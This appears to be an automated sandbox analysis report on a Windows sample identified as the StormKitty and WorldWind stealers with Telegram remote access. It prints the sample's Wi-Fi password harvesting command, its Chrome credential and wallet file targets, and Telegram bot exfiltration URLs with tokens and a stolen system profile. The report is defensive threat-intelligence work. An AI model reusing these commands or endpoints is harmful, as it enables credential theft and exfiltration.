                                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile Jump to behavior
                                  Found many strings related to Crypto-Wallets (likely being stolen)
                                  Source: file.exe, 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Electrum#\Electrum\wallets
                                  Source: file.exe, 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                                  Source: file.exe, 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
                                  Source: file.exe, 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                                  Source: file.exe, 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
                                  Source: file.exe, 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                                  Source: file.exe, 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                                  Tries to harvest and steal browser information (history, passwords, etc)
                                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR

                                  Remote Access Functionality

                                  barindex
                                  Yara detected Telegram RAT
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                                  Yara detected StormKitty Stealer
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                                  Yara detected WorldWind Stealer
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                  Source: Yara matchFile source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.741988818.0000000003328000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR

                                  Mitre Att&ck Matrix

                                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                                  Valid Accounts131
                                  Windows Management Instrumentation                                  		1
                                  Scheduled Task/Job                                  		11
                                  Process Injection                                  		11
                                  Disable or Modify Tools                                  		1
                                  OS Credential Dumping                                  		2
                                  File and Directory Discovery                                  		Remote Services11
                                  Archive Collected Data                                  		Exfiltration Over Other Network Medium1
                                  Web Service                                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                                  Data Encrypted for Impact
                                  Default Accounts2
                                  Command and Scripting Interpreter                                  		Boot or Logon Initialization Scripts1
                                  Scheduled Task/Job                                  		1
                                  Deobfuscate/Decode Files or Information                                  		11
                                  Input Capture                                  		144
                                  System Information Discovery                                  		Remote Desktop Protocol2
                                  Data from Local System                                  		Exfiltration Over Bluetooth1
                                  Ingress Tool Transfer                                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                                  Domain Accounts1
                                  Scheduled Task/Job                                  		Logon Script (Windows)Logon Script (Windows)11
                                  Obfuscated Files or Information                                  		Security Account Manager341
                                  Security Software Discovery                                  		SMB/Windows Admin Shares11
                                  Input Capture                                  		Automated Exfiltration11
                                  Encrypted Channel                                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                                  Software Packing                                  		NTDS1
                                  Process Discovery                                  		Distributed Component Object ModelInput CaptureScheduled Transfer3
                                  Non-Application Layer Protocol                                  		SIM Card SwapCarrier Billing Fraud
                                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                                  Timestomp                                  		LSA Secrets241
                                  Virtualization/Sandbox Evasion                                  		SSHKeyloggingData Transfer Size Limits4
                                  Application Layer Protocol                                  		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                                  Replication Through Removable MediaLaunchdRc.commonRc.common1
                                  Masquerading                                  		Cached Domain Credentials1
                                  Application Window Discovery                                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                                  External Remote ServicesScheduled TaskStartup ItemsStartup Items241
                                  Virtualization/Sandbox Evasion                                  		DCSync1
                                  Remote System Discovery                                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
                                  Process Injection                                  		Proc Filesystem1
                                  System Network Configuration Discovery                                  		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                                  Behavior Graph

                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 893767 Sample: file.exe Startdate: 23/06/2023 Architecture: WINDOWS Score: 100 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 51 15 other signatures 2->51 7 file.exe 15 165 2->7         started        process3 dnsIp4 39 127.0.0.1 unknown unknown 7->39 41 202.200.1.0.in-addr.arpa 7->41 43 3 other IPs or domains 7->43 31 C:\Users\user\AppData\...behaviorgraphNLQNHOLWB.jpg, ASCII 7->31 dropped 33 C:\Users\user\AppData\...\QFAPOWPAFG.docx, ASCII 7->33 dropped 35 C:\Users\user\AppData\...35IRMEKAMZH.xlsx, ASCII 7->35 dropped 37 2 other malicious files 7->37 dropped 53 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 7->53 55 May check the online IP address of the machine 7->55 57 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 7->57 59 3 other signatures 7->59 12 cmd.exe 1 7->12         started        15 cmd.exe 1 7->15         started        file5 signatures6 process7 signatures8 61 Uses netsh to modify the Windows network and firewall settings 12->61 63 Tries to harvest and steal WLAN passwords 12->63 17 netsh.exe 3 12->17         started        19 conhost.exe 12->19         started        21 findstr.exe 1 12->21         started        23 chcp.com 1 12->23         started        25 netsh.exe 3 15->25         started        27 conhost.exe 15->27         started        29 chcp.com 1 15->29         started        process9

                                  Screenshots

                                  Thumbnails

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand

                                  Antivirus, Machine Learning and Genetic Malware Detection

                                  Initial Sample

                                  SourceDetectionScannerLabelLink
                                  file.exe75%VirustotalBrowse
                                  file.exe100%AviraHEUR/AGEN.1307527
                                  file.exe100%Joe Sandbox ML

                                  Dropped Files

                                  No Antivirus matches

                                  Unpacked PE Files

                                  No Antivirus matches

                                  Domains

                                  SourceDetectionScannerLabelLink
                                  202.200.1.0.in-addr.arpa0%VirustotalBrowse

                                  URLs

                                  SourceDetectionScannerLabelLink
                                  https://api.telegram.org40%URL Reputationsafe
                                  https://api.telegram0%URL Reputationsafe
                                  https://api.telegram0%URL Reputationsafe
                                  http://crl.microsoft.c0%URL Reputationsafe
                                  https://api.mylnikov.org40%Avira URL Cloudsafe
                                  https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13100%Avira URL Cloudmalware

                                  Domains and IPs

                                  Contacted Domains

                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  api.mylnikov.org
                                  		172.67.196.114
                                  		truefalse
                                    		high
                                    api.telegram.org
                                    		149.154.167.220
                                    		truefalse
                                      		high
                                      icanhazip.com
                                      		104.18.114.97
                                      		truefalse
                                        		high
                                        202.200.1.0.in-addr.arpa
                                        		unknown
                                        		unknowntrueunknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=1165040754&text=%F0%9F%93%81%20Uploading%20Log%20Folders...false
                                          		high
                                          http://icanhazip.com/false
                                            		high
                                            https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendDocument?chat_id=1165040754false
                                              		high
                                              https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:0c:29:82:cb:33false
                                                		high
                                                https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=1165040754&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202023-06-23%209:21:17%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20116938%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20F8HBZTST%0ARAM:%204095MB%0AHWID:%2067C81467FB%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%2084.17.52.5%0ABSSID:%2000:0c:29:82:cb:33%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%209%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=Truefalse
                                                  		high
                                                  https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866false
                                                    		high

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drfalse
                                                      		high
                                                      https://duckduckgo.com/ac/?q=tmp27E2.tmp.dat.0.drfalse
                                                        		high
                                                        https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13file.exefalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://api.telegram.orgfile.exe, 00000000.00000002.741988818.0000000003393000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.741988818.00000000038A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drfalse
                                                            		high
                                                            https://api.telegram.org/botfile.exefalse
                                                              		high
                                                              https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096file.exe, 00000000.00000002.741988818.0000000003393000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://api.mylnikov.org4file.exe, 00000000.00000002.741988818.00000000032FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendfile.exefalse
                                                                  		high
                                                                  https://search.yahoo.com?fr=crmas_sfpffile.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drfalse
                                                                    		high
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp27E2.tmp.dat.0.drfalse
                                                                      		high
                                                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchfile.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drfalse
                                                                        		high
                                                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=file.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drfalse
                                                                          		high
                                                                          https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessagefile.exe, 00000000.00000002.741988818.0000000003909000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ac.ecosia.org/autocomplete?q=tmp27E2.tmp.dat.0.drfalse
                                                                              		high
                                                                              https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendDocument?chat_id=1165file.exe, 00000000.00000002.741988818.00000000038A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://search.yahoo.com?fr=crmas_sfpfile.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drfalse
                                                                                  		high
                                                                                  https://github.com/LimerBoy/StormKittyHnfile.exe, 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://api.telegram.org4file.exe, 00000000.00000002.741988818.0000000003328000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://github.com/LimerBoy/StormKittyfile.exefalse
                                                                                      		high
                                                                                      https://api.telegramfile.exe, 00000000.00000002.741988818.0000000003909000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://crl.microsoft.cfile.exe, 00000000.00000002.745606612.0000000005DFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://icanhazip.comfile.exe, 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://api.telegram.org/file/botfile.exefalse
                                                                                          		high
                                                                                          http://api.telegram.orgfile.exe, 00000000.00000002.741988818.0000000003393000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp27E2.tmp.dat.0.drfalse
                                                                                                		high
                                                                                                https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=11650file.exe, 00000000.00000002.741988818.0000000003328000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high

                                                                                                  World Map of Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public IPs

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  149.154.167.220
                                                                                                  		api.telegram.orgUnited Kingdom
                                                                                                  		62041TELEGRAMRUfalse
                                                                                                  172.67.196.114
                                                                                                  		api.mylnikov.orgUnited States
                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                  104.18.114.97
                                                                                                  		icanhazip.comUnited States
                                                                                                  		13335CLOUDFLARENETUSfalse

                                                                                                  Private

                                                                                                  IP
                                                                                                  127.0.0.1

                                                                                                  General Information

                                                                                                  Joe Sandbox Version:37.1.0 Beryl
                                                                                                  Analysis ID:893767
                                                                                                  Start date and time:2023-06-23 21:20:14 +02:00
                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                  Overall analysis duration:0h 8m 1s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                  Number of analysed new started processes analysed:11
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • HDC enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample file name:file.exe
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.rans.troj.spyw.evad.winEXE@17/129@5/4
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HDC Information:Failed
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  • Number of executed functions: 11
                                                                                                  • Number of non-executed functions: 7
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe

                                                                                                  Warnings

                                                                                                  • Exclude process from analysis (whitelisted): WMIADAP.exe
                                                                                                  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  21:21:40API Interceptor11x Sleep call for process: file.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  149.154.167.220DHL_KULI500796823__SCAN_DOCUMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    yxZU6Cnjb59Epyk.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      siJoJbrWS7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        2vGk2NUSlA.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                          New_Order_List_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            SOA_#_87594094.exeGet hashmaliciousAgentTesla, FormBook, NeshtaBrowse
                                                                                                              Shipment_and_BL_Instructions_Docs.docx.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                UPDATED_STATEMENT_OF_ACCOUNT.exeGet hashmaliciousAgentTesla, NeshtaBrowse
                                                                                                                  QUOTATION_9982.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                    Documents.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      SecuriteInfo.com.Heur.31923.1569.exeGet hashmaliciousAgentTesla, NeshtaBrowse
                                                                                                                        Holoo.apkGet hashmaliciousUnknownBrowse
                                                                                                                          PURCHASE_ORDER_(2).exeGet hashmaliciousAgentTesla, NeshtaBrowse
                                                                                                                            Signed_Contract.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              92c0d20b-1d25-39a4-08a0-97f10465d636.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                7057_DRAFT-7947963_68379.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                  SWIFT_Giden_mesaj_bildirimi_-_28740,80_USD_-_I103.pdf.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                    SecuriteInfo.com.Gen.Variant.Nemesis.22775.16398.31863.exeGet hashmaliciousAgentTesla, PrivateLoaderBrowse
                                                                                                                                      SOA_#_87594094.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                        Invoice_0230621_087860_092920-DOCX.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                          172.67.196.114file.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              Rn7yRZDGjUDjkIw.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                file.exeGet hashmaliciousAsyncRAT, DcRat, StormKittyBrowse
                                                                                                                                                  panel.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                    Yahoo_vip_main.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                      luxurioux.exeGet hashmaliciousAsyncRAT, BitRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                        c0PZAXHMCpdh5F1.exeGet hashmaliciousClipboard Hijacker, Redline Clipper, StealeriumBrowse
                                                                                                                                                          Crunchyroll [CHECKER 2023] V1.3.exeGet hashmaliciousAsyncRAT, StormKittyBrowse

                                                                                                                                                            Domains

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            api.mylnikov.org2vGk2NUSlA.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                            • 104.21.44.66
                                                                                                                                                            qcUGD0Al6f.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                            • 104.21.44.66
                                                                                                                                                            file.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 104.21.44.66
                                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            ap6B2upFrF.exeGet hashmaliciousAsyncRAT, DcRat, StormKittyBrowse
                                                                                                                                                            • 104.21.44.66
                                                                                                                                                            05500299.exeGet hashmaliciousAmadey, Babuk, Djvu, Fabookie, SmokeLoaderBrowse
                                                                                                                                                            • 104.21.44.66
                                                                                                                                                            file.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
                                                                                                                                                            • 104.21.44.66
                                                                                                                                                            file.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
                                                                                                                                                            • 104.21.44.66
                                                                                                                                                            d_#U2620.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                            • 104.21.44.66
                                                                                                                                                            all_usa_bank_checker_email_pass.bin.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                            • 104.21.44.66
                                                                                                                                                            Rn7yRZDGjUDjkIw.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            file.exeGet hashmaliciousAsyncRAT, DcRat, StormKittyBrowse
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            panel.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            f2wWJWlU2B.exeGet hashmaliciousClipboard Hijacker, StealeriumBrowse
                                                                                                                                                            • 104.21.44.66
                                                                                                                                                            Uz7xV1sZk5.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                            • 104.21.44.66
                                                                                                                                                            0wn3mo3qWy.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                            • 104.21.44.66
                                                                                                                                                            Yahoo_vip_main.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            U6rL8X2c83.exeGet hashmaliciousAsyncRAT, Njrat, StormKittyBrowse
                                                                                                                                                            • 104.21.44.66
                                                                                                                                                            a0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                            • 104.21.44.66
                                                                                                                                                            api.telegram.orgDHL_KULI500796823__SCAN_DOCUMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            yxZU6Cnjb59Epyk.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            siJoJbrWS7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            2vGk2NUSlA.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            New_Order_List_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            SOA_#_87594094.exeGet hashmaliciousAgentTesla, FormBook, NeshtaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            Shipment_and_BL_Instructions_Docs.docx.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            UPDATED_STATEMENT_OF_ACCOUNT.exeGet hashmaliciousAgentTesla, NeshtaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            QUOTATION_9982.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            Documents.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            SecuriteInfo.com.Heur.31923.1569.exeGet hashmaliciousAgentTesla, NeshtaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            PURCHASE_ORDER_(2).exeGet hashmaliciousAgentTesla, NeshtaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            Signed_Contract.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
